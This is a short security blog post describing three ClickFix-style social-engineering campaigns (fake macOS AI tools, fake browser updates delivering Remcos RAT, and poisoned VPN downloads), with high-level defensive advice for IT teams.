John Z Black
Brunswick, ME • (207) 245-1010 • contact@johnzblack.com
There’s a malware delivery technique that doesn’t need an exploit, a vulnerability, or a malicious attachment. It just needs the user to follow instructions.
Copy this command. Paste it into Terminal. Press Enter.
That’s the whole attack. It’s called ClickFix, and this week it showed up in three separate campaigns on three different platforms.
Campaign 1: Fake AI tools on macOS. Websites offer what looks like a slick AI productivity tool. The install process asks you to paste a command into Terminal. Mac users do it because it looks like a normal install step. Homebrew alone has trained millions of developers to paste commands from websites. The attackers are exploiting a learned behavior. Once executed, MacSync deploys an infostealer that harvests credentials, browser data, and session tokens. No Gatekeeper bypass. No code signing tricks. The user was the vulnerability.
Campaign 2: Fake browser updates on Windows. The SmartApeSG campaign runs compromised websites that show a pop-up saying your browser needs an urgent update. Looks convincing. Matches the browser’s visual style. You click, it opens a command prompt, asks you to run a script. Payload is Remcos RAT. Full remote access. Keylogging, screen capture, credential theft. It works because it exploits the most common user interaction on the internet: clicking through a notification to make it go away.
Campaign 3: Poisoned VPN downloads. Storm-2561 is running SEO poisoning to put fake VPN download pages at the top of search results. You Google your VPN client, find a page that looks official, download the installer. Except it’s a credential-stealing trojan.
And that last one raises a question IT departments need to answer honestly: why are your users Googling for VPN clients instead of getting them from an internal source?
Three campaigns. Probably not coordinated. Different groups, different payloads, different targets. But they all share the same delivery philosophy: get the user to be the final step in the attack chain. No need to find a bug in the OS. No need to bypass security controls. Just get the user to run a command, click a button, or install something they think is legit.
This is social engineering evolving past email phishing into something more ambient. Phishing impersonates a trusted sender. ClickFix impersonates a trusted interaction pattern. Install this. Update your browser. Paste this command. Things people do every day.
Traditional endpoint defenses struggle here. AV can flag known bad binaries, but the user triggers the initial execution through a legitimate system interface. EDR catches post-exploitation behavior, but by then the trojan’s already running.
What to do about it:
Block clipboard-paste execution in managed environments where you can. Manage software distribution centrally so users aren’t Googling for tools. Train specifically against ClickFix, because generic “don’t click suspicious links” training doesn’t cover this. And if you’ve got Mac endpoints, drop the “Macs don’t get viruses” mentality. macOS social engineering delivery is accelerating fast.
The uncomfortable truth is that the internet trained users to do exactly what the attackers are asking. Copy. Paste. Execute. We built that behavior into every dev onboarding, every install guide, every Stack Overflow answer. The attackers just borrowed the interaction pattern.